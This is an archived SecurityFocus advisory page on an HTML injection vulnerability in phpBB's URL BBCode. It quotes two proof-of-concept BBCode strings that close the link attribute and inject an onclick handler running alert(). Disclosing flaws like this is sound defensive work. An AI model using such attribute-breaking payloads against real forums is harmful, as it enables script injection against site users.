info
discussion
exploit
solution
references
PHPBB URL BBCode HTML Injection Vulnerability
The following proof of concept has been supplied:
[url=http://www.example.com" onclick="alert('Hello')]text[/url]
[url=http://www.example.com" onclick=alert("bug");"]test[/url]
Privacy Statement
Copyright 2010, SecurityFocus
